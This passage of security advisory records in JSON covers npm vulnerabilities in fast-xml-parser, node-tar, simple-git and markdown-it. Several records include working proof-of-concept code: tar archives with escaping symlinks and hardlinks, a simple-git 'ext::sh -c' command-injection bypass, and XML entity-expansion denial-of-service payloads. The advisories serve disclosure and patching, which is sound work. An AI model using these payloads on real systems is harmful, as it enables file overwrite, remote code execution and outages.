~1.3 KB of XML\nconsole.timeEnd(\u0027parse\u0027);\n\n// 5,000 chars \u00d7 100 refs takes 200+ seconds\n// 50,000 chars \u00d7 1,000 refs will hang indefinitely\n```\n\n### Impact\nThis is a straightforward denial-of-service issue.\n\nAny service that parses user-supplied XML using the default configuration is vulnerable. Since Node.js runs on a single thread, the moment the parser starts expanding entities, the event loop is blocked. While this is happening, the server can\u2019t handle any other requests.\n\nIn testing, a payload of only a few kilobytes was enough to make a simple HTTP server completely unresponsive for several minutes, with all other requests timing out.\n\n### Workaround\n\nAvoid using DOCTYPE parsing by `processEntities: false` option.",
  "id": "GHSA-jmr7-xgp7-cmfj",
  "modified": "2026-02-27T16:50:38Z",
  "published": "2026-02-17T21:30:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "fast-xml-parser affected by DoS through entity expansion in DOCTYPE (no expansion limit)"
}

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 7.5.10"
      },
      "package": {
        "ecosystem": "npm",
        "name": "tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.5.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-31802"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-10T23:44:58Z",
    "nvd_published_at": "2026-03-10T07:44:58Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n`tar` (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as `C:../../../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction.\n\n### Details\nThe extraction logic in `Unpack[STRIPABSOLUTEPATH]` validates `..` segments against a resolved path that still uses the original drive-relative value, and only afterwards rewrites the stored `linkpath` to the stripped value.\n\nWhat happens with `linkpath: \"C:../../../target.txt\"`:\n1. `stripAbsolutePath()` removes `C:` and rewrites the value to `../../../target.txt`.\n2. The escape check resolves using the original pre-stripped value, so it is treated as in-bounds and accepted.\n3. Symlink creation uses the rewritten value (`../../../target.txt`) from nested path `a/b/l`.\n4. Writing through the extracted symlink overwrites the outside file (`../target.txt`).\n\nThis is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives.\n\n### PoC\nTested on Arch Linux with `tar@7.5.10`.\n\nPoC script (`poc.cjs`):\n\n```js\nconst fs = require(\u0027fs\u0027)\nconst path = require(\u0027path\u0027)\nconst { Header, x } = require(\u0027tar\u0027)\n\nconst cwd = process.cwd()\nconst target = path.resolve(cwd, \u0027..\u0027, \u0027target.txt\u0027)\nconst tarFile = path.join(cwd, \u0027poc.tar\u0027)\n\nfs.writeFileSync(target, \u0027ORIGINAL\\n\u0027)\n\nconst b = Buffer.alloc(1536)\nnew Header({\n  path: \u0027a/b/l\u0027,\n  type: \u0027SymbolicLink\u0027,\n  linkpath: \u0027C:../../../target.txt\u0027,\n}).encode(b, 0)\nfs.writeFileSync(tarFile, b)\n\nx({ cwd, file: tarFile }).then(() =\u003e {\n  fs.writeFileSync(path.join(cwd, \u0027a/b/l\u0027), \u0027PWNED\\n\u0027)\n  process.stdout.write(fs.readFileSync(target, \u0027utf8\u0027))\n})\n```\n\nRun:\n\n```bash\nnode poc.cjs \u0026\u0026 readlink a/b/l \u0026\u0026 ls -l a/b/l ../target.txt\n```\n\nObserved output:\n\n```text\nPWNED\n../../../target.txt\nlrwxrwxrwx - joshuavr  7 Mar 18:37 \udb82\udc6f a/b/l -\u003e ../../../target.txt\n.rw-r--r-- 6 joshuavr  7 Mar 18:37 \uf15c ../target.txt\n```\n\n`PWNED` confirms outside file content overwrite. `readlink` and `ls -l` confirm the extracted symlink points outside the extraction directory.\n\n### Impact\nThis is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.\n\nRealistic scenarios:\n- CLI tools unpacking untrusted tarballs into a working directory\n- build/update pipelines consuming third-party archives\n- services that import user-supplied tar files",
  "id": "GHSA-9ppj-qmqm-q256",
  "modified": "2026-03-10T23:44:58Z",
  "published": "2026-03-10T23:44:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31802"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/node-tar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "node-tar Symlink Path Traversal via Drive-Relative Linkpath"
}

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 7.5.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-23745"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-16T21:16:20Z",
    "nvd_published_at": "2026-01-16T22:16:26Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe `node-tar` library (`\u003c= 7.5.2`) fails to sanitize the `linkpath` of `Link` (hardlink) and `SymbolicLink` entries when `preservePaths` is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to **Arbitrary File Overwrite** via hardlinks and **Symlink Poisoning** via absolute symlink targets.\n\n### Details\n\nThe vulnerability exists in `src/unpack.ts` within the `[HARDLINK]` and `[SYMLINK]` methods.\n\n**1. Hardlink Escape (Arbitrary File Overwrite)**\n\nThe extraction logic uses `path.resolve(this.cwd, entry.linkpath)` to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (`entry.linkpath`) is an **absolute path**, `path.resolve` ignores the first argument (`this.cwd`) entirely and returns the absolute path.\n\nThe library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the host (e.g., `/etc/passwd`) and subsequently write to it, if file permissions allow writing to the target file, bypassing path-based security measures that may be in place.\n\n**2. Symlink Poisoning**\n\nThe extraction logic passes the user-supplied `entry.linkpath` directly to `fs.symlink` without validation. This allows the creation of symbolic links pointing to sensitive absolute system paths or traversing paths (`../../`), even when secure extraction defaults are used.\n\n### PoC\n\nThe following script generates a binary TAR archive containing malicious headers (a hardlink to a local file and a symlink to `/etc/passwd`). It then extracts the archive using standard `node-tar` settings and demonstrates the vulnerability by verifying that the local \"secret\" file was successfully overwritten.\n\n```javascript\nconst fs = require(\u0027fs\u0027)\nconst path = require(\u0027path\u0027)\nconst tar = require(\u0027tar\u0027)\n\nconst out = path.resolve(\u0027out_repro\u0027)\nconst secret = path.resolve(\u0027secret.txt\u0027)\nconst tarFile = path.resolve(\u0027exploit.tar\u0027)\nconst targetSym = \u0027/etc/passwd\u0027\n\n// Cleanup \u0026 Setup\ntry { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}\nfs.mkdirSync(out)\nfs.writeFileSync(secret, \u0027ORIGINAL_DATA\u0027)\n\n// 1. Craft malicious Link header (Hardlink to absolute local file)\nconst h1 = new tar.Header({\n  path: \u0027exploit_hard\u0027,\n  type: \u0027Link\u0027,\n  size: 0,\n  linkpath: secret \n})\nh1.encode()\n\n// 2. Craft malicious Symlink header (Symlink to /etc/passwd)\nconst h2 = new tar.Header({\n  path: \u0027exploit_sym\u0027,\n  type: \u0027SymbolicLink\u0027,\n  size: 0,\n  linkpath: targetSym \n})\nh2.encode()\n\n// Write binary tar\nfs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))\n\nconsole.log(\u0027[*] Extracting malicious tarball...\u0027)\n\n// 3. Extract with default secure settings\ntar.x({\n  cwd: out,\n  file: tarFile,\n  preservePaths: false\n}).then(() =\u003e {\n  console.log(\u0027[*] Verifying payload...\u0027)\n\n  // Test Hardlink Overwrite\n  try {\n    fs.writeFileSync(path.join(out, \u0027exploit_hard\u0027), \u0027OVERWRITTEN\u0027)\n    \n    if (fs.readFileSync(secret, \u0027utf8\u0027) === \u0027OVERWRITTEN\u0027) {\n      console.log(\u0027[+] VULN CONFIRMED: Hardlink overwrite successful\u0027)\n    } else {\n      console.log(\u0027[-] Hardlink failed\u0027)\n    }\n  } catch (e) {}\n\n  // Test Symlink Poisoning\n  try {\n    if (fs.readlinkSync(path.join(out, \u0027exploit_sym\u0027)) === targetSym) {\n      console.log(\u0027[+] VULN CONFIRMED: Symlink points to absolute path\u0027)\n    } else {\n      console.log(\u0027[-] Symlink failed\u0027)\n    }\n  } catch (e) {}\n})\n\n```\n\n### Impact\n\n* **Arbitrary File Overwrite:** An attacker can overwrite any file the extraction process has access to, bypassing path-based security restrictions. It does not grant write access to files that the extraction process does not otherwise have access to, such as root-owned configuration files.\n* **Remote Code Execution (RCE):** In CI/CD environments or automated pipelines, overwriting configuration files, scripts, or binaries leads to code execution. (However, npm is unaffected, as it filters out all `Link` and `SymbolicLink` tar entries from extracted packages.)",
  "id": "GHSA-8qq5-rm4j-mr97",
  "modified": "2026-02-18T23:43:46Z",
  "published": "2026-01-16T21:16:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23745"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/node-tar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "node-tar is Vulnerable to Arbitrary File Overwrite and Symlink Poisoning via Insufficient Path Sanitization"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "simple-git"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.15.0"
            },
            {
              "fixed": "3.32.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28292"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-178",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-10T18:38:56Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe `blockUnsafeOperationsPlugin` in `simple-git` fails to block git protocol\noverride arguments when the config key is passed in uppercase or mixed case.\nAn attacker who controls arguments passed to git operations can enable the\n`ext::` protocol by passing `-c PROTOCOL.ALLOW=always`, which executes an\narbitrary OS command on the host machine.\n\n---\n\n### Details\n\nThe `preventProtocolOverride` function in\n`simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts` (line 24)\nchecks whether a `-c` argument configures `protocol.allow` using this regex:\n\n```ts\nif (!/^\\s*protocol(.[a-z]+)?.allow/.test(next)) {\n   return;\n}\n```\n\nThis regex is case-sensitive. Git treats config key names\ncase-insensitively \u2014 it normalises them to lowercase internally.\nAs a result, passing `PROTOCOL.ALLOW=always`, `Protocol.Allow=always`,\nor any mixed-case variant is not matched by the regex, the check\nreturns without throwing, and git is spawned with the unsafe argument.\n\n**Verification that git normalises the key:**\n\n```bash\n$ git -c PROTOCOL.ALLOW=always config --list | grep protocol\nprotocol.allow=always\n```\n\n**The fix is a single character \u2014 add the `/i` flag:**\n\n```ts\n// Before (vulnerable):\nif (!/^\\s*protocol(.[a-z]+)?.allow/.test(next)) {\n\n// After (fixed):\nif (!/^\\s*protocol(.[a-z]+)?.allow/i.test(next)) {\n```\n\n---\n\n## poc.js\n\n```js\n/**\n * Proof of Concept \u2014 simple-git preventProtocolOverride Case-Sensitivity Bypass\n *\n * CVE-2022-25912 was fixed in simple-git@3.15.0 by adding a regex check\n * that blocks `-c protocol.*.allow=always` from being passed to git commands.\n * The regex is case-sensitive. Git treats config key names case-insensitively.\n * Passing `-c PROTOCOL.ALLOW=always` bypasses the check entirely.\n *\n * Affected : simple-git \u003e= 3.15.0 (all versions with the fix applied)\n * Tested on: simple-git@3.32.2, Node.js v23.11.0, git 2.39.5\n * Reporter : CodeAnt AI Security Research (securityreseach@codeant.ai)\n */\n\nconst simpleGit = require(\u0027simple-git\u0027);\nconst fs = require(\u0027fs\u0027);\n\nconst SENTINEL = \u0027/tmp/pwn-codeant\u0027;\n\n// Clean up from any previous run\ntry { fs.unlinkSync(SENTINEL); } catch (_) {}\n\nconst git = simpleGit();\n\n// \u2500\u2500 Original CVE-2022-25912 vector \u2014 BLOCKED by the 2022 fix \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n// This is the exact PoC Snyk used to report CVE-2022-25912.\n// It is correctly blocked by preventProtocolOverride in block-unsafe-operations-plugin.ts.\ngit.clone(\u0027ext::sh -c touch% /tmp/pwn-original% \u003e\u00262\u0027, \u0027/tmp/example-new-repo\u0027, [\n  \u0027-c\u0027, \u0027protocol.ext.allow=always\u0027,   // lowercase \u2014 caught by regex\n]).catch((e) =\u003e {\n  console.log(\u0027ext:: executed:poc\u0027, fs.existsSync(SENTINEL) ? \u0027PWNED \u2014 \u0027 + SENTINEL + \u0027 created\u0027 : \u0027not created\u0027);\n  console.error(e);\n});\n\n// \u2500\u2500 Bypass \u2014 PROTOCOL.ALLOW=always (uppercase) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n// The fix regex /^\\s*protocol(.[a-z]+)?.allow/ is case-sensitive.\n// Git normalises config key names to lowercase internally.\n// Uppercase variant passes the check; git enables ext:: and executes the command.\ngit.clone(\u0027ext::sh -c touch% \u0027 + SENTINEL + \u0027% \u003e\u00262\u0027, \u0027/tmp/example-new-repo-2\u0027, [\n  \u0027-c\u0027, \u0027PROTOCOL.ALLOW=always\u0027,       // uppercase \u2014 NOT caught by regex\n]).catch((e) =\u003e {\n  console.log(\u0027ext:: executed:\u0027, fs.existsSync(SENTINEL) ? \u0027PWNED \u2014 \u0027 + SENTINEL + \u0027 created\u0027 : \u0027not created\u0027);\n  console.error(e);\n});\n\n// \u2500\u2500 Real-world scenario \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n// An application cloning a legitimate repository with user-controlled customArgs.\n// Attacker supplies PROTOCOL.ALLOW=always alongside a malicious ext:: URL.\n// The application intends to clone https://github.com/CodeAnt-AI/codeant-quality-gates\n// but the injected argument enables ext:: and the real URL executes the command instead.\n//\n// Legitimate usage (what the app expects):\n//   simpleGit().clone(\u0027https://github.com/CodeAnt-AI/codeant-quality-gates\u0027,\n//                     \u0027/tmp/codeant-quality-gates\u0027, userArgs)\n//\n// Attacker-controlled scenario (what actually runs when args are not sanitised):\nconst LEGITIMATE_URL = \u0027https://github.com/CodeAnt-AI/codeant-quality-gates\u0027;\nconst CLONE_DEST     = \u0027/tmp/codeant-quality-gates\u0027;\nconst SENTINEL_RW    = \u0027/tmp/pwn-realworld\u0027;\ntry { fs.unlinkSync(SENTINEL_RW); } catch (_) {}\n\nconst userArgs   = [\u0027-c\u0027, \u0027PROTOCOL.ALLOW=always\u0027];\nconst attackerURL = \u0027ext::sh -c touch% \u0027 + SENTINEL_RW + \u0027% \u003e\u00262\u0027;\n\nsimpleGit().clone(\n  attackerURL,   // should have been LEGITIMATE_URL\n  CLONE_DEST,\n  userArgs\n).catch(() =\u003e {\n  console.log(\u0027real-world scenario [target: \u0027 + LEGITIMATE_URL + \u0027]:\u0027,\n    fs.existsSync(SENTINEL_RW) ? \u0027PWNED \u2014 \u0027 + SENTINEL_RW + \u0027 created\u0027 : \u0027not created\u0027);\n});\n```\n\n---\n\n## Test Results\n\n### Vector 1 \u2014 Original CVE-2022-25912 (`protocol.ext.allow=always`, lowercase)\n\n**Result: BLOCKED \u2705**\n\nThe original Snyk PoC payload using lowercase `protocol.ext.allow=always` is correctly intercepted by `preventProtocolOverride` before git is invoked. A `GitPluginError` is thrown immediately and the sentinel file is never created.\n\n**Output:**\n```\next:: executed:poc not created\nGitPluginError: Configuring protocol.allow is not permitted without enabling allowUnsafeExtProtocol\n    at preventProtocolOverride (.../simple-git/dist/cjs/index.js:1228:9)\n    at .../simple-git/dist/cjs/index.js:1266:40\n    at Array.forEach (\u003canonymous\u003e)\n    at Object.action (.../simple-git/dist/cjs/index.js:1264:12)\n    at PluginStore.exec (.../simple-git/dist/cjs/index.js:1489:29)\n    at GitExecutorChain.attemptRemoteTask (.../simple-git/dist/cjs/index.js:1881:36)\n    at GitExecutorChain.attemptTask (.../simple-git/dist/cjs/index.js:1865:88) {\n  task: {\n    commands: [\n      \u0027clone\u0027,\n      \u0027-c\u0027,\n      \u0027protocol.ext.allow=always\u0027,\n      \u0027ext::sh -c touch% /tmp/pwn-original% \u003e\u00262\u0027,\n      \u0027/tmp/example-new-repo\u0027\n    ],\n    format: \u0027utf-8\u0027,\n    parser: [Function: parser]\n  },\n  plugin: \u0027unsafe\u0027\n}\n```\n\n---\n\n### Vector 2 \u2014 Uppercase bypass (`PROTOCOL.ALLOW=always`)\n\n**Result: BYPASSED \u26a0\ufe0f \u2014 RCE confirmed**\n\nThe `preventProtocolOverride` regex `/^\\s*protocol(.[a-z]+)?.allow/` is case-sensitive. `PROTOCOL.ALLOW=always` (uppercase) passes the check without error. Git normalises config key names to lowercase internally, enabling the `ext::` protocol. The injected shell command executes before git errors on the missing repository stream.\n\n**Output:**\n```\next:: executed: PWNED \u2014 /tmp/pwn-codeant created\nGitError: Cloning into \u0027/tmp/example-new-repo-2\u0027...\nfatal: Could not read from remote repository.\n\nPlease make sure you have the correct access rights\nand the repository exists.\n\n    at Object.action (.../simple-git/dist/cjs/index.js:1440:25)\n    at PluginStore.exec (.../simple-git/dist/cjs/index.js:1489:29) {\n  task: {\n    commands: [\n      \u0027clone\u0027,\n      \u0027-c\u0027,\n      \u0027PROTOCOL.ALLOW=always\u0027,\n      \u0027ext::sh -c touch% /tmp/pwn-codeant% \u003e\u00262\u0027,\n      \u0027/tmp/example-new-repo-2\u0027\n    ],\n    format: \u0027utf-8\u0027,\n    parser: [Function: parser]\n  }\n}\n```\n\n`/tmp/pwn-codeant` was created by the git subprocess \u2014 command execution confirmed.\n\n---\n\n### Vector 3 \u2014 Real-world scenario (target: `https://github.com/CodeAnt-AI/codeant-quality-gates`)\n\n**Result: BYPASSED \u26a0\ufe0f \u2014 RCE confirmed**\n\nAn application passes user-controlled `customArgs` to `simpleGit().clone()`. The attacker injects `PROTOCOL.ALLOW=always` and substitutes a malicious `ext::` URL in place of the intended repository URL. The plugin does not block the uppercase variant; git enables `ext::` and executes the payload before the application can detect the failure.\n\n**Output:**\n```\nreal-world scenario [target: https://github.com/CodeAnt-AI/codeant-quality-gates]: PWNED \u2014 /tmp/pwn-realworld created\n```\n\n`/tmp/pwn-realworld` was created \u2014 arbitrary command execution in a realistic application context confirmed.\n\n---\n\n## Summary\n\n| # | Vector | Payload | Sentinel file | Result |\n|---|--------|---------|---------------|--------|\n| 1 | CVE-2022-25912 original | `protocol.ext.allow=always` (lowercase) | not created | Blocked \u2705 |\n| 2 | Case-sensitivity bypass | `PROTOCOL.ALLOW=always` (uppercase) | `/tmp/pwn-codeant` created | **RCE \u26a0\ufe0f** |\n| 3 | Real-world app scenario | `PROTOCOL.ALLOW=always` + attacker URL | `/tmp/pwn-realworld` created | **RCE \u26a0\ufe0f** |\n\nThe case-sensitive regex in `preventProtocolOverride` blocks `protocol.*.allow` but does not account for uppercase or mixed-case variants. Git accepts all variants identically due to case-insensitive config key normalisation, allowing full bypass of the protection in all versions of simple-git that carry the 2022 fix.\n\n`/tmp/pwned` is created by the git subprocess via the `ext::` protocol.\n\nAll of the following bypass the check:\n\n| Argument passed via `-c` | Regex matches? | Git honours it? |\n|--------------------------|:--------------:|:---------------:|\n| `protocol.allow=always`  | \u2705 blocked     | \u2705              |\n| `PROTOCOL.ALLOW=always`  | \u274c bypassed    | \u2705              |\n| `Protocol.Allow=always`  | \u274c bypassed    | \u2705              |\n| `PROTOCOL.allow=always`  | \u274c bypassed    | \u2705              |\n| `protocol.ALLOW=always`  | \u274c bypassed    | \u2705              |\n\n---\n\n### Impact\n\nAny application that passes user-controlled values into the `customArgs`\nparameter of `clone()`, `fetch()`, `pull()`, `push()` or similar `simple-git`\nmethods is vulnerable to arbitrary command execution on the host machine.\n\nThe `ext::` git protocol executes an arbitrary binary as a remote helper.\nWith `protocol.allow=always` enabled, an attacker can run any OS command\nas the process user \u2014 full read, write and execution access on the host.",
  "id": "GHSA-r275-fr43-pm7q",
  "modified": "2026-03-10T18:38:56Z",
  "published": "2026-03-10T18:38:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/steveukx/git-js/commit/f7042088aa2dac59e3c49a84d7a2f4b26048a257"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/steveukx/git-js"
    },
    {
      "type": "WEB",
      "url": "https://www.codeant.ai/security-research/security-research-simple-git-remote-code-execution-cve-2026-28292"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "simple-git has blockUnsafeOperationsPlugin bypass via case-insensitive protocol.allow config key enables RCE"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "markdown-it"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "13.0.0"
            },
            {
              "fixed": "14.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-2327"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-13T20:04:39Z",
    "nvd_published_at": "2026-02-12T06:16:02Z",
    "severity": "MODERATE"
  },
  "details": "Versions of the package markdown-it from 13.0.0 and before 14.1.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition.",
  "id": "GHSA-38c4-r59v-3vqw",
  "modified": "2026-02-13T20:04:39Z",
  "published": "2026-02-12T06:30:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2327"
    },
    {
      "type": "WEB",
      "url": "https://github.com/markdown-it/markdown-it/commit/4b4bbcae5e0990a5b172378e507b33a59012ed26"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/ltduc147/c9abecae1b291ede4f692f2ab988c917"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/markdown-it/markdown-it"
    },
    {
      "type": "WEB",
      "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs#L33"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JS-MARKDOWNIT-10666750"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "markdown-it is has a Regular Expression Denial of Service (ReDoS)"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.5.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-beta.3"
            },
            {
              "fixed": "4.5.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33036"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-17T19:45:41Z",
    "nvd_published_at": "2026-03-20T06:16:11Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe fix for CVE-2026-26278 added entity expansion limits (`maxTotalExpansions`, `maxExpandedLength`, `maxEntityCount`, `maxEntitySize`) to prevent XML entity expansion Denial of Service. However, these limits are only enforced for DOCTYPE-defined entities. **Numeric character references** (`\u0026#NNN;` and `\u0026#xHH;`) and standard XML entities (`\u0026lt;`, `\u0026gt;`, etc.) are processed through a separate code path that does NOT enforce any expansion limits.\n\nAn attacker can use massive numbers of numeric entity references to completely bypass all configured limits, causing excessive memory allocation and CPU consumption.\n\n## Affected Versions\n\nfast-xml-parser v5.x through v5.5.3 (and likely v5.5.5 on npm)\n\n## Root Cause\n\nIn `src/xmlparser/OrderedObjParser.js`, the `replaceEntitiesValue()` function has two separate entity replacement loops:\n\n1. **Lines 638-670**: DOCTYPE entities \u2014 expansion counting with `entityExpansionCount` and `currentExpandedLength` tracking. This was the CVE-2026-26278 fix.\n2. **Lines 674-677**: `lastEntities` loop \u2014 replaces standard entities including `num_dec` (`/\u0026#([0-9]{1,7});/g`) and `num_hex` (`/\u0026#x([0-9a-fA-F]{1,6});/g`). **This loop has NO expansion counting at all.**\n\nThe numeric entity regex replacements at lines 97-98 are part of `lastEntities` and go through the uncounted loop, completely bypassing the CVE-2026-26278 fix.\n\n## Proof of Concept\n\n```javascript\nconst { XMLParser } = require(\u0027fast-xml-parser\u0027);\n\n// Even with strict explicit limits, numeric entities bypass them\nconst parser = new XMLParser({\n  processEntities: {\n    enabled: true,\n    maxTotalExpansions: 10,\n    maxExpandedLength: 100,\n    maxEntityCount: 1,\n    maxEntitySize: 10\n  }\n});\n\n// 100K numeric entity references \u2014 should be blocked by maxTotalExpansions=10\nconst xml = `\u003croot\u003e${\u0027\u0026#65;\u0027.repeat(100000)}\u003c/root\u003e`;\nconst result = parser.parse(xml);\n\n// Output: 500,000 chars \u2014 bypasses maxExpandedLength=100 completely\nconsole.log(\u0027Output length:\u0027, result.root.length);  // 500000\nconsole.log(\u0027Expected max:\u0027, 100);  // limit was 100\n```\n\n**Results:**\n- 100K `\u0026#65;` references \u2192 500,000 char output (5x default maxExpandedLength of 100,000)\n- 1M references \u2192 5,000,000 char output, ~147MB memory consumed\n- Even with `maxTotalExpansions=10` and `maxExpandedLength=100`, 10K references produce 50,000 chars\n- Hex entities (`\u0026#x41;`) exhibit the same bypass\n\n## Impact\n\n**Denial of Service** \u2014 An attacker who can provide XML input to applications using fast-xml-parser can cause:\n- Excessive memory allocation (147MB+ for 1M entity references)\n- CPU consumption during regex replacement\n- Potential process crash via OOM\n\nThis is particularly dangerous because the application developer may have explicitly configured strict entity expansion limits believing they are protected, while numeric entities silently bypass all of them.\n\n## Suggested Fix\n\nApply the same `entityExpansionCount` and `currentExpandedLength` tracking to the `lastEntities` loop (lines 674-677) and the HTML entities loop (lines 680-686), similar to how DOCTYPE entities are tracked at lines 638-670.\n\n## Workaround\n\nSet `htmlEntities:false`",
  "id": "GHSA-8gc5-j5rx-235r",
  "modified": "2026-03-25T14:31:39Z",
  "published": "2026-03-17T19:45:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33036"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01"
    },
    {
      "type": "PACKAGE",
